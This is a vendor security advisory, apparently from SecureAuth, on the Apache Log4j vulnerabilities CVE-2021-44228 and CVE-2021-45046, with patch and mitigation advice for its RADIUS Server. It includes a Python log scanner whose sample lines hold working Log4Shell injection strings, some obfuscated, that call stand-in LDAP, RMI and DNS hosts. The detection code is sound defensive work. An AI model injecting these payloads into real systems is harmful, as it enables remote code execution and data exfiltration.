SecureAuth security advisory – Apache Log4j vulnerability

Updated: December 15, 2021

On December 9, 2021, a critical unauthenticated remote code execution (RCE) vulnerability in the Apache Log4j 2 Java logging library (CVE-2021-44228) was disclosed publicly on Twitter and a proof-of-concept (PoC) exploit was posted on GitHub. An attacker who can get an attacker-controlled string logged by a vulnerable application can take full control of the affected server. Because the vulnerability is so easy to exploit, its impact is severe, and it is already being actively exploited in the wild.

Some SecureAuth products do use Apache Log4j in some components; however, the following products do not use the vulnerable class directly:

  • SecureAuth Identity Platform release 9.x through 21.04

  • Login for Endpoints

  • SecureAuth Authenticate app (Android and iOS)

  • Adaptive Authentication

The one remaining component that is potentially affected is the SecureAuth RADIUS Server. In some configurations it could be compromised with the proof-of-concept exploit that was released.

Our Engineering department has resolved the issue with the latest version of the SecureAuth RADIUS Server, which you can download from the SecureAuth Product Downloads page.

For upgrade instructions, see Upgrade SecureAuth IdP RADIUS Server to v20.12.

Note

RADIUS Server upgrade known issue:

SecureAuth RADIUS Server v20.12 sometimes has issues importing configuration files exported from RADIUS Server v20.03 or v20.06 when a shared secret was configured per RADIUS client. (There is no issue if RADIUS Server v20.03 or v20.06 was configured with a general shared secret set on the RADIUS Server Settings page.)

Workaround: Set the shared secret for each v20.12 RADIUS client again.

In addition to the RADIUS Server upgrade, consider implementing firewall rules that restrict the RADIUS Server to communicating only with known, trusted destinations; the exploit relies on the vulnerable server making an outbound JNDI (for example LDAP or RMI) connection to an attacker-controlled host, so blocking unexpected egress limits the damage even before patching. We also recommend sending the RADIUS logs to a centralized logging solution that can scan them for indicators of compromise.
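To illustrate the log-scanning recommendation above, the following is an added example written for this page; it is not SecureAuth code or part of any SecureAuth product. It decodes the common Log4j lookup obfuscations (`${lower:...}`, `${upper:...}`, `${...:-x}` default values and URL encoding) before looking for the `${jndi:...}` pattern, and extracts the callback host so it can be blocked or hunted for. The log lines, field names and IP addresses are constructed for the example and are not from a real RADIUS Server log.

```python
import re
from urllib.parse import unquote

# Innermost Log4j 2 lookups that attackers use to hide the literal "jndi" token.
# Both patterns deliberately exclude "$", "{" and "}" inside the lookup so that only
# the innermost lookup matches; the outer ones are resolved on later rounds.
_CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")   # ${::-j}, ${env:NOPE:-j}, ...

# Final detector: a JNDI lookup with an optional scheme://host part for the callback.
_JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:([a-z][a-z0-9+.-]*)://([^/\s}]+))?", re.IGNORECASE
)


def normalize(text, max_rounds=10):
    """Resolve nested case/default lookups until the string stops changing."""
    text = unquote(text)  # undo URL encoding such as %24%7Bjndi%3A...
    for _ in range(max_rounds):
        new = _CASE_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def detect(line):
    """Return (scheme, host) if the line carries a JNDI lookup after decoding, else None."""
    m = _JNDI_RE.search(normalize(line))
    if m is None:
        return None
    scheme = m.group(1).lower() if m.group(1) else None
    return scheme, m.group(2)


def scan_log(lines):
    """Scan log lines (1-indexed) and return one finding per line that carries a lookup."""
    findings = []
    for n, line in enumerate(lines, start=1):
        hit = detect(line)
        if hit is not None:
            findings.append({"line": n, "scheme": hit[0], "host": hit[1], "decoded": normalize(line)})
    return findings


def callback_hosts(findings):
    """Distinct, sorted callback hosts from the findings: block-list / hunting input."""
    return sorted({f["host"] for f in findings if f["host"]})


# Constructed sample RADIUS-style log lines (not real data); lines 2-6 carry payloads.
LOG_LINES = [
    "2021-12-11 03:12:44 INFO Access-Request from 10.0.0.12 User-Name=jsmith NAS-Identifier=vpn-gw1",
    "2021-12-11 03:12:45 INFO Access-Request from 203.0.113.7 User-Name=${jndi:ldap://198.51.100.23:1389/a}",
    "2021-12-11 03:12:46 INFO Access-Request from 203.0.113.7 User-Name=${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/b}",
    "2021-12-11 03:12:47 INFO Access-Request from 203.0.113.7 User-Name=${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.23:1099/c}",
    "2021-12-11 03:12:48 INFO Access-Request from 203.0.113.7 User-Name=${${env:BARFOO:-j}ndi${env:BARFOO:-:}ldap://198.51.100.23:1389/d}",
    "2021-12-11 03:12:49 INFO Access-Request from 203.0.113.7 NAS-Identifier=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%2Fx%7D",
    "2021-12-11 03:12:50 INFO Access-Accept for User-Name=msmith Class=${not_a_lookup}",
]

if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f"line {f['line']}: {f['scheme']} -> {f['host']}  ({f['decoded']})")
    print("callback hosts:", callback_hosts(scan_log(LOG_LINES)))
```

Matching on the decoded form rather than on the raw string is the point of the example: the plain `${jndi:` signature misses every line except the first payload, while a DNS-only lookup (line 6) still leaks the target's existence even when outbound LDAP and RMI are blocked, so every hit is worth investigating.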

Update

A second vulnerability affecting Apache Log4j 2 versions up to and including 2.15.0 (CVE-2021-45046, https://nvd.nist.gov/vuln/detail/CVE-2021-45046) was published on December 14, 2021, because the fix in 2.15.0 was incomplete in certain non-default configurations.

The fix SecureAuth released on December 14, 2021 remediates this new vulnerability as well.

Questions?

If you have questions or require assistance upgrading your RADIUS server, please contact SecureAuth Support:

Support Portal: support.secureauth.com

Email: support@secureauth.com

Phone: (866) 859-1526